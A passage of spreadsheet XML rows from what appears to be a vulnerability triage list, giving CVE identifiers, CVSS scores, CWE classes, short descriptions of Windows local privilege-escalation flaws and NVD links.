      <c r="J2153" s="5" t="inlineStr"/>
      <c r="K2153" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2153" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="2154">
      <c r="A2154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69432</t>
        </is>
      </c>
      <c r="C2154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2154" s="5" t="inlineStr"/>
      <c r="F2154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2154" s="5" t="inlineStr"/>
      <c r="H2154" s="5" t="inlineStr"/>
      <c r="I2154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2154" s="5" t="inlineStr"/>
      <c r="K2154" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2154" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t>
        </is>
      </c>
    </row>
    <row r="2155">
      <c r="A2155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69433</t>
        </is>
      </c>
      <c r="C2155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2155" s="5" t="inlineStr"/>
      <c r="F2155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2155" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2155" s="5" t="inlineStr"/>
      <c r="I2155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2155" s="5" t="inlineStr"/>
      <c r="K2155" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2155" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t>
        </is>
      </c>
    </row>
    <row r="2156">
      <c r="A2156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69436</t>
        </is>
      </c>
      <c r="C2156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2156" s="5" t="inlineStr"/>
      <c r="F2156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2156" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2156" s="5" t="inlineStr"/>
      <c r="I2156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2156" s="5" t="inlineStr"/>
      <c r="K2156" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2156" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t>
        </is>
      </c>
    </row>
    <row r="2157">
      <c r="A2157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69444</t>
        </is>
      </c>
      <c r="C2157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2157" s="5" t="inlineStr"/>
      <c r="F2157" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2157" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2157" s="5" t="inlineStr"/>
      <c r="I2157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2157" s="5" t="inlineStr"/>
      <c r="K2157" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2157" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t>
        </is>
      </c>
    </row>
    <row r="2158">
      <c r="A2158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69445</t>
        </is>
      </c>
      <c r="C2158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2158" s="5" t="inlineStr"/>
      <c r="F2158" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2158" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2158" s="5" t="inlineStr"/>
      <c r="I2158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2158" s="5" t="inlineStr"/>
      <c r="K2158" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2158" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t>
        </is>
      </c>
    </row>
    <row r="2159">
      <c r="A2159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69447</t>
        </is>
      </c>
      <c r="C2159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2159" s="5" t="inlineStr"/>
      <c r="F2159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2159" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2159" s="5" t="inlineStr"/>
      <c r="I2159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2159" s="5" t="inlineStr"/>
      <c r="K2159" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2159" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t>
        </is>
      </c>
    </row>
    <row r="2160">
      <c r="A2160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69450</t>
        </is>
      </c>
      <c r="C2160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2160" s="5" t="inlineStr"/>
      <c r="F2160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2160" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2160" s="5" t="inlineStr"/>
      <c r="I2160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2160" s="5" t="inlineStr"/>
      <c r="K2160" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2160" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t>
        </is>
      </c>
    </row>
    <row r="2161">
      <c r="A2161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69455</t>
        </is>
      </c>
      <c r="C2161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2161" s="5" t="inlineStr"/>
      <c r="F2161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2161" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2161" s="5" t="inlineStr"/>
      <c r="I2161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2161" s="5" t="inlineStr"/>
      <c r="K2161" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2161" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t>
        </is>
      </c>
    </row>
    <row r="2162">
      <c r="A2162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="C2162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2162" s="5" t="inlineStr"/>
      <c r="F2162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2162" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2162" s="5" t="inlineStr"/>
      <c r="I2162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2162" s="5" t="inlineStr"/>
      <c r="K2162" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2162" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="2163">
      <c r="A2163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69459</t>
        </is>
      </c>
      <c r="C2163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2163" s="5" t="inlineStr"/>
      <c r="F2163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2163" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2163" s="5" t="inlineStr"/>
      <c r="I2163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2163" s="5" t="inlineStr"/>
      <c r="K2163" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2163" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t>
        </is>
      </c>
    </row>
    <row r="2164">
      <c r="A2164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69467</t>
        </is>
      </c>
      <c r="C2164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2164" s="5" t="inlineStr"/>
      <c r="F2164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2164" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2164" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I2164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2164" s="5" t="inlineStr"/>
      <c r="K2164" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2164" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t>
        </is>
      </c>
    </row>
    <row r="2165">
      <c r="A2165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="C2165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2165" s="5" t="inlineStr"/>
      <c r="F2165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2165" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2165" s="5" t="inlineStr"/>
      <c r="I2165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2165" s="5" t="inlineStr"/>
      <c r="K2165" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L2165" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="2166">
      <c r="A2166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="C2166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2166" s="5" t="inlineStr"/>
      <c r="F2166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2166" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2166" s="5" t="inlineStr"/>
      <c r="I2166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2166" s="5" t="inlineStr"/>
      <c r="K2166" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2166" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="2167">
      <c r="A2167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69478</t>
        </is>
      </c>
      <c r="C2167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2167" s="5" t="inlineStr"/>
      <c r="F2167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2167" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2167" s="5" t="inlineStr"/>
      <c r="I2167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2167" s="5" t="inlineStr"/>
      <c r="K2167" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2167" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t>
        </is>
      </c>
    </row>
    <row r="2168">
      <c r="A2168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69480</t>
        </is>
      </c>
      <c r="C2168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2168" s="5" t="inlineStr"/>
      <c r="F2168" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2168" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2168" s="5" t="inlineStr"/>
      <c r="I2168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2168" s="5" t="inlineStr"/>
      <c r="K2168" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t>
        </is>
      </c>
    </row>
    <row r="2169">
      <c r="A2169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="C2169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2169" s="5" t="inlineStr"/>
      <c r="F2169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2169" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2169" s="5" t="inlineStr"/>
      <c r="I2169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2169" s="5" t="inlineStr"/>
      <c r="K2169" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2169" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="2170">
      <c r="A2170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69508</t>
        </is>
      </c>
      <c r="C2170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2170" s="5" t="inlineStr"/>
      <c r="F2170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2170" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2170" s="5" t="inlineStr"/>
      <c r="I2170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2170" s="5" t="inlineStr"/>
      <c r="K2170" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2170" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t>
        </is>
      </c>
    </row>
    <row r="2171">
      <c r="A2171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69509</t>
        </is>
      </c>
      <c r="C2171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2171" s="5" t="inlineStr"/>
      <c r="F2171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2171" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2171" s="5" t="inlineStr"/>
      <c r="I2171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2171" s="5" t="inlineStr"/>
      <c r="K2171" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L2171" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t>
        </is>
      </c>
    </row>
    <row r="2172">
      <c r="A2172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69513</t>
        </is>
      </c>
      <c r="C2172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2172" s="5" t="inlineStr"/>
      <c r="F2172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2172" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2172" s="5" t="inlineStr"/>
      <c r="I2172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2172" s="5" t="inlineStr"/>
      <c r="K2172" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2172" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t>
        </is>
      </c>
    </row>
    <row r="2173">
      <c r="A2173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69528</t>
        </is>
      </c>
      <c r="C2173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2173" s="5" t="inlineStr"/>
      <c r="F2173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2173" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2173" s="5" t="inlineStr"/>
      <c r="I2173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2173" s="5" t="inlineStr"/>
      <c r="K2173" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2173" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t>
        </is>
      </c>
    </row>
    <row r="2174">
      <c r="A2174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="C2174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2174" s="5" t="inlineStr"/>
      <c r="F2174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2174" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2174" s="5" t="inlineStr"/>
      <c r="I2174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2174" s="5" t="inlineStr"/>
      <c r="K2174" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2174" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="2175">
      <c r="A2175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69534</t>
        </is>
      </c>
      <c r="C2175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2175" s="5" t="inlineStr"/>
      <c r="F2175" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2175" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2175" s="5" t="inlineStr"/>
      <c r="I2175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2175" s="5" t="inlineStr"/>
      <c r="K2175" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2175" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t>
        </is>
      </c>
    </row>
    <row r="2176">
      <c r="A2176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69535</t>
        </is>
      </c>
      <c r="C2176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2176" s="5" t="inlineStr"/>
      <c r="F2176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2176" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2176" s="5" t="inlineStr"/>
      <c r="I2176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2176" s="5" t="inlineStr"/>
      <c r="K2176" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L2176" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t>
        </is>
      </c>
    </row>
    <row r="2177">
      <c r="A2177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69538</t>
        </is>
      </c>
      <c r="C2177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2177" s="5" t="inlineStr"/>
      <c r="F2177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2177" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2177" s="5" t="inlineStr"/>
      <c r="I2177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2177" s="5" t="inlineStr"/>
      <c r="K2177" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
